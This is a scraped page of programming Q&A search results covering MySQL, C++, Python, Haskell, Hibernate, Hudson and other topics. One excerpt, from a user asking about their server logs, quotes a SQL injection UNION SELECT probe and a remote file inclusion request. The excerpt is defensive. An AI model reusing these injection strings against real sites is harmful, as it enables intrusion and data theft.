Search Results

Search found 3292 results on 132 pages for 'nhibernate statistics'.

Page 107/132 | < Previous Page | 103 104 105 106 107 108 109 110 111 112 113 114  | Next Page >

  • MySQL: filling empty fields with zeroes when using GROUP BY

    - by SaltLake
    I've got MySQL table CREATE TABLE cms_webstat ( ID int NOT NULL auto_increment PRIMARY KEY, TIMESTAMP_X timestamp DEFAULT CURRENT_TIMESTAMP, # ... some other fields ... ) which contains statistics about site visitors. For getting visits per hour I use SELECT hour(TIMESTAMP_X) as HOUR , count(*) AS HOUR_STAT FROM cms_webstat GROUP BY HOUR ORDER BY HOUR DESC which gives me | HOUR | HOUR_STAT | | 24 | 15 | | 23 | 12 | | 22 | 9 | | 20 | 3 | | 18 | 2 | | 15 | 1 | | 12 | 3 | | 9 | 1 | | 3 | 5 | | 2 | 7 | | 1 | 9 | | 0 | 12 | And I'd like to get following: | HOUR | HOUR_STAT | | 24 | 15 | | 23 | 12 | | 22 | 9 | | 21 | 0 | | 20 | 3 | | 19 | 0 | | 18 | 2 | | 17 | 0 | | 16 | 0 | | 15 | 1 | | 14 | 0 | | 13 | 0 | | 12 | 3 | | 11 | 0 | | 10 | 0 | | 9 | 1 | | 8 | 0 | | 7 | 0 | | 6 | 0 | | 5 | 0 | | 4 | 0 | | 3 | 5 | | 2 | 7 | | 1 | 9 | | 0 | 12 | How should I modify the query to get such result? Thanks.

    Read the article

  • C++ option/long option implementation

    - by K Hein
    I am working on a parser for meta programming language using C++ on Linux platform. Right now, I need to implement option/long option for the parser to provide some additional features. Basically, if the user pass in some additional option, the parser needs to store statistics while parsing the text files. I can think of two ways to implement it. One way is to user global to store options entered by users. Another way is to create a singleton class to store options. So I would like to know if there is any other way to implement it. What is the best/most recommended way of implementing it? Thanks in advance. Regards, K.Hein

    Read the article

  • compute mean in python for a generator

    - by nmaxwell
    Hi, I'm doing some statistics work, I have a (large) collection of random numbers to compute the mean of, I'd like to work with generators, because I just need to compute the mean, so I don't need to store the numbers. The problem is that numpy.mean breaks if you pass it a generator. I can write a simple function to do what I want, but I'm wondering if there's a proper, built-in way to do this? It would be nice if I could say "sum(values)/len(values)", but len doesn't work for genetators, and sum already consumed values. here's an example: import numpy def my_mean(values): n = 0 Sum = 0.0 try: while True: Sum += next(values) n += 1 except StopIteration: pass return float(Sum)/n X = [k for k in range(1,7)] Y = (k for k in range(1,7)) print numpy.mean(X) print my_mean(Y) these both give the same, correct, answer, buy my_mean doesn't work for lists, and numpy.mean doesn't work for generators. I really like the idea of working with generators, but details like this seem to spoil things. thanks for any help -nick

    Read the article

  • Have parameters in Dao methods to get entities the most efficient way for read-only access

    - by Blankman
    Allot of my use of hibernate, at least for that data that is presented on many parts of the web application, is for read-only purposes. I want to add some parameters to my Dao methods so I can modify the way hibernate pulls the data and how it handles transactions etc. Example usage: Data on the front page of my website is displayed to the users, it is read-only, so I want to avoid any session/entity tracking that hibernate usually does. This is data that is read-only, will not be changed in this transaction, etc. What would be the most performant way to pull the data? (the code below is c#/nhibernate, I'm implementing this in java as I learn it) public IList<Article> GetArticles() { return Session.CreateCriteria(typeof(Article)) // some where cluase }

    Read the article

  • Best way to collect and store data daily?

    - by mktb
    I have a bunch of statistics: # of users, # of families, ratio user/family, etc. I'd like to store these daily so I can view this data historically. However, I'm looking for the most effective way to store this data. Should I run a cron job that writes to the database DATE: today USERS: 123 FAMILIES: 456 RATIO: 7.89 or whatever? (or should I write multiple rows like DATE: today DATATYPE: users VALUE: 123?) Or is there another option I can use that is more efficient or more effective? Thanks!

    Read the article

  • Integrating Hudson with MS Test?

    - by hangy
    Is it possible to integrate Hudson with MS Test? I am setting up a smaller CI server on my development machine with Hudson right now, just so that I can have some statistics (ie. FxCop and compiler warnings). Of course, it would also be nice if it could just run my unit tests and present their output. Up to now, I have added the following batch task to Hudson, which makes it run the tests properly. "%PROGRAMFILES%\Microsoft Visual Studio 9.0\Common7\IDE\MSTest.exe" /runconfig:LocalTestRun.testrunconfig /testcontainer:Tests\bin\Debug\Tests.dll However, as far as I know, Hudson does not support analysis of MS Test results, yet. Does anyone know whether the TRX files generated by MSTest.exe can be transformed to the JUnit or NUnit result format (because those are supported by Hudson), or whether there is any other way to integrate MS Test unit tests with Hudson?

    Read the article

  • Load balancing and scheduling algorithms.

    - by Lukas Šalkauskas
    Hello there, so here is my problem: I have several different configuarion servers. I have different calculations (jobs); I can predict how long approximately each job will take to be caclulated. Also, I have priorities. My question is how to keep all machines loaded 99-100% and schedule the jobs in the best way. Each machine can do several calculations at a time. Jobs are pushed to the machine. The central machine knows the current load of each machine. Also, I would like to to assign some kind of machine learning here, because I will know statistics of each job (started, finished, cpu load etc.). How can I distribute jobs (calculations) in the best possible way, keeping in mind the priorities? Any suggestions, ideas, or algorithms ? FYI: My platform .NET.

    Read the article

  • Parallel Haskell in order to find the divisors of a huge number

    - by Dragno
    I have written the following program using Parallel Haskell to find the divisors of 1 billion. import Control.Parallel parfindDivisors :: Integer->[Integer] parfindDivisors n = f1 `par` (f2 `par` (f1 ++ f2)) where f1=filter g [1..(quot n 4)] f2=filter g [(quot n 4)+1..(quot n 2)] g z = n `rem` z == 0 main = print (parfindDivisors 1000000000) I've compiled the program with ghc -rtsopts -threaded findDivisors.hs and I run it with: findDivisors.exe +RTS -s -N2 -RTS I have found a 50% speedup compared to the simple version which is this: findDivisors :: Integer->[Integer] findDivisors n = filter g [1..(quot n 2)] where g z = n `rem` z == 0 My processor is a dual core 2 duo from Intel. I was wondering if there can be any improvement in above code. Because in the statistics that program prints says: Parallel GC work balance: 1.01 (16940708 / 16772868, ideal 2) and SPARKS: 2 (1 converted, 0 overflowed, 0 dud, 0 GC'd, 1 fizzled) What are these converted , overflowed , dud, GC'd, fizzled and how can help to improve the time.

    Read the article

  • What's The Best Object-Relational Mapping Tool For .NET?

    - by Icono123
    I've worked on a few Java web projects and we've always used Hibernate for our data object layer. I haven't worked on a large scale ASP.NET site and I'm unsure which solution to choose. I'm tempted to try NHibernate, but I don't like the fact that they use so many third party libraries. I found this list on Wikipedia of available ORM software: http://en.wikipedia.org/wiki/List_of_object-relational_mapping_software#.NET What ORM have you used? Was it easy to use? Would you recommend using it again? Was it used on a small, medium, or large project? Would you write your own? Thanks.

    Read the article

  • Incremental Compilation in Eclipse. ASTNode-s and SVN versioning

    - by Alex
    Hi there, I am building up some statistics after analyzing the source code in eclipse. But the overall process is too slow because i rebuild my model every time from scratch after each compilation. I am looking for a way to get only the changed parts of the code (as ASTNodes) and to rebuild just that part of my model. I suppose that even the changed compilation units and not the exact code elements would be enough after the user compiles and still would be a nice optimization. I am sure eclipse is capable of knowing what code elements are changed (and even to know their semantics), because when I use the subclipse plugin my changes are ordered by a code element (an import, a method, a variable declaration, etc). Well.. at least that plugin is capable of knowing that info. Thanks in advance

    Read the article

  • Efficient alternatives to merge for larger data.frames R

    - by Etienne Low-Décarie
    I am looking for an efficient (both computer resource wise and learning/implementation wise) method to merge two larger (size1 million / 300 KB RData file) data frames. "merge" in base R and "join" in plyr appear to use up all my memory effectively crashing my system. Example load test data frame and try test.merged<-merge(test, test) or test.merged<-join(test, test, type="all") - The following post provides a list of merge and alternatives: How to join data frames in R (inner, outer, left, right)? The following allows object size inspection: https://heuristically.wordpress.com/2010/01/04/r-memory-usage-statistics-variable/ Data produced by anonym

    Read the article

  • Popular open source projects using Zend Framework

    - by Alexander
    Hello, I am trying to find any open source project based on Zend Framework. Something well written and as popular as Wordpress or Drupal to see actual benefits of ZF as well as possibly use it as an example. The only 'showcase' I managed to find is http://framework.zend.com/wiki/pages/viewpage.action?pageId=14134. But this list looks confusing as for the 'official' PHP framework. The same is about ZF statistics by numbers (http://framework.zend.com/about/numbers) - 10 million downloads against 400 actual projects which is less than 500 examples in the user guide... Also Yahoo chose Symfony for their bookmarks service not ZF... Am I missing something? Thank you!

    Read the article

  • Treating a fat webservice in .net 3.5 c#

    - by Chris M
    I'm dealing with an obese 3rd party webservice that returns about 3mb of data for a simple search results, about 50% of the data in that response is junk. Would it make sense then to remap this data to my own result object and ditch the response so I'm storing 1-2 mb in memory for filtering and sorting rather than using the web-responses own object and using 2-4 or am I missing a point? So far I've been accessing the webservice from a separate project and using a new class to provide the interaction and to handle the persistence so my project looks like this |- Web (mvc2 proj) |- DAL (database/storage fluent-nhibernate) |- SVCGateway (interaction layer + webservice related models) |- Services -------------- |- Tests |- Specs I'm trying to make the application behave fast and I also need to store the result set temporarily in case a customer goes to view the product and wants to go back to the results. (Service returns only 500 of possible 14K results). So basically I'm looking for confirmation that I'm doing the right thing in pushing the results into my own objects or if I'm breaking some rule or even if there's a better way of handling it. Thanks

    Read the article

  • BufferedReader ready method in a while loop to determine EOF?

    - by BobTurbo
    I have a large file (wikipedia english arcticles only database as xml file) I am using to read one character at a time using BufferedReader. The psuedo code is: file = BufferedReader... while (file.ready()) character = file.read() is this actually valid? Or will ready just return false when it is waiting for the HDD to return data and not actually when the EOF has been reached? I tried to use if (file.read() == -1) but seemed to run into an infinite loop that I literally could not find. I am just wondering if it is reading the whole file as my statistics say 444 380 wikipedia pages have been read but I thought there were many more articles..

    Read the article

  • Get local network interface addresses using only proc?

    - by Matt Joiner
    How can I obtain the (IPv4) addresses for all network interfaces using only proc? After some extensive investigation I've discovered the following: ifconfig makes use of SIOCGIFADDR, which requires open sockets and advance knowledge of all the interface names. It also isn't documented in any manual pages on Linux. proc contains /proc/net/dev, but this is a list of interface statistics. proc contains /proc/net/if_inet6, which is exactly what I need but for IPv6. Generally interfaces are easy to find in proc, but actual addresses are very rarely used except where explicitly part of some connection. There's a system call called getifaddrs, which is very much a "magical" function you'd expect to see in Windows. It's also implemented on BSD. However it's not very text-oriented, which makes it difficult to use from non-C languages.

    Read the article

  • C++Math evaluating incorrectly

    - by Hayden
    I thought I can make life a little easier in data statistics by making a small program which returns the results of sampling distribution of the mean (with standard error). It does this part successfully but in an attempt to return the z-score by using the formula I found here, it returns -1#IND. My interpretation of that formula is: ((1/(sqrt(2*pi)*stdev))*pow(e, (normalpow)) where double normalpow=-0.5*((mean-popmean)*(mean-popmean)/stdev) I did a little more investigating and found that (mean-popmean)*(mean-popmean) was evaluating to 0 no matter what. How can I get around this problem of normalpow evaluating to 0.

    Read the article

  • Entity Framework projections

    - by David McClelland
    We are investigating the Entity Framework to see if it will meet our particular needs. Here is the scenario I am interested in: I have a large table (let's call it VeryWideRecord) which has many columns, and it has a corresponding business object (it's also called VeryWideRecord). I would like to be able to query my database for a VeryWideRecord business object, but only have values for certain columns returned by the underlying SQL. Can I do this with the Entity Framework? I am uncertain as to whether this could be done with the Entity Framework's table splitting feature, because the application needs to be able (at runtime) to change the columns that are requested. The reason for this is that we are trying to minimize the amount of information that is going across the wire. I see how this could be done using NHibernate (example), but how can I do this with the Entity Framework?

    Read the article

  • Is this an injection attempt or a normal request?

    - by CheeseConQueso
    In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example: /?x=19&y=15 The numbers are random, but its always setting x and y variables. Another category of mysterious requests: /?id=http://nic.bupt.edu.cn/media/j1.txt?? There are other attempts at injections in the request log that have straight sql written into them as well. Example: /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13-- It looks like they are all reaching a 404, but I'm still wondering about the intent behind these. I know this is vague, but maybe someone knows that this is normal while using cPanel & phpMyAdmin services. Also, there was a search box installed on the site which could be the reason. Any suggestions as to what all these are?

    Read the article

  • SAS(Statistical Analysis System) Career As a computer science student

    - by Renju
    Hi. I have completed MSc in Computer science this academic year. So I am fresher... While I am doing graduation and post graduation I did many projects using PHP and MySQL. Now I got opportunity to get into SAS(Statistical Analysis System) career, and I heard that SAS having better career growth than PHP developement. For the past 4 days, I was working with SAS and I feel interested in working. My questions are, Since i am a computer science student whether i will have any problem in my career growth in SAS? I am ready to learn statistics also, is there anything else I have to do? Doing certification in SAS will make any changes? Is it a bad idea to get into SAS with only CSc backgrond? So please guide me for my career...

    Read the article

  • Less Mathematical Approaches to Machine Learning?

    - by Ed
    Out of curiosity, I've been reading up a bit on the field of Machine Learning, and I'm surprised at the amount of computation and mathematics involved. One book I'm reading through uses advanced concepts such as Ring Theory and PDEs (note: the only thing I know about PDEs is that they use that funny looking character). This strikes me as odd considering that mathematics itself is a hard thing to "learn." Are there any branches of Machine Learning that use different approaches? I would think that a approaches relying more on logic, memory, construction of unfounded assumptions, and over-generalizations would be a better way to go, since that seems more like the way animals think. Animals don't (explicitly) calculate probabilities and statistics; at least as far as I know.

    Read the article

  • Data driven charts and graphs from xml to svg

    - by garymlewis
    I asked this question a week ago, but did not do a good job of describing the problem. Here's a second attempt. I'd like to produce data-driven charts, graphs, and other data visualizations, starting with data in an xml database and ending up with the visualizations as SVG. Here's an example from the W3C. It uses Javascript to create a stacked bar chart as SVG from xml. I'd like to do something similar but use a graphics library (or ???) instead of js to handle the construction of axes, labels, titles, data points, etc. My question, then: what are the options that I should consider ... things like Raphael I suppose, but initially I'd like to cast a wide net and look at many different options. My experience is all with static data visualizations using statistics packages like R, but eventually I'd like to create interactive data visualizations with html5/css3/svg. Any help would be much appreciated. Thanks.

    Read the article

  • Copy of Access mdb database being updated by live database

    - by James
    I'm trying to compute statistics for data held in an Access .mdb database. In order to avoid interfering with the live database, I'm working from a copy which I made by simply using copy-paste in Windows Explorer. The copy resides in the same directory, but with a different name. I'm using R and RODBC to connect to the copy of the file. The strange thing is that new data that is being updated on the original live database is appearing in my queries. This is despite the file timestamps of the copy not changing at all. It is also causing some slowdown in the live database. My understanding is that the .mdb files are standalone, or is this not the case? Should I have copied the database in a different way?

    Read the article

  • Using the MySql ASP.NET membership provider with existing users

    - by ScottBelchak
    I have been tasked with migrating an existing mature ASP.NET 2.0 web site to NHibernate, Mono and MySQL or postgres. I am somewhat confused as how the membership provider salts the passwords. If I make the switch and use the MySQL membership provider (outlined in this question) or AspSqlProvider, will the existing users be able to login? I guess it would be easier for me to ask: How the hell do I get access to the encryption key used by the ASP.NET membership provider that salts the passwords so that I can use the same one in a third party provider?

    Read the article

  • How to analyse Wikipedia article's data base with R?

    - by Tal Galili
    Hi all, This is a "big" question, that I don't know how to start, so I hope some of you can give me a direction. And if this is not a "good" question, I will close the thread with an apology. I wish to go through the database of Wikipedia (let's say the English one), and do statistics. For example, I am interested in how many active editors (which should be defined) Wikipedia had at each point of time (let's say in the last 2 years). I don't know how to build such a database, how to access it, how to know which types of data it has and so on. So my questions are: What tools do I need for this (besides basic R) ? MySQL on my computer? RODBC database connection? How do you start planning for such a project?

    Read the article

  • Web and stand-alone apps development tendency

    - by Narek
    There is a strong tendency of making web apps and even seems that very soon a lot of features will be available online so that for every day use people will have all necessary software free online and they will not need to install any software locally. Only specific (professional) tools that usually people don’t use at home will not be available as a web app. So my question, how do you imagine selling software that was necessary for everyday use and was not free (seems they can't make money any more by selling their product – no need of those products). And what disadvantages have web apps, that is to say, what is bad to use software online compared with having the same software locally (please list)? Please do not consider this question not connected with programming, as I really would like to have a little statistics from professional programmers who are aware from nowday’s tendency of software and programming. Thanks.

    Read the article

< Previous Page | 103 104 105 106 107 108 109 110 111 112 113 114  | Next Page >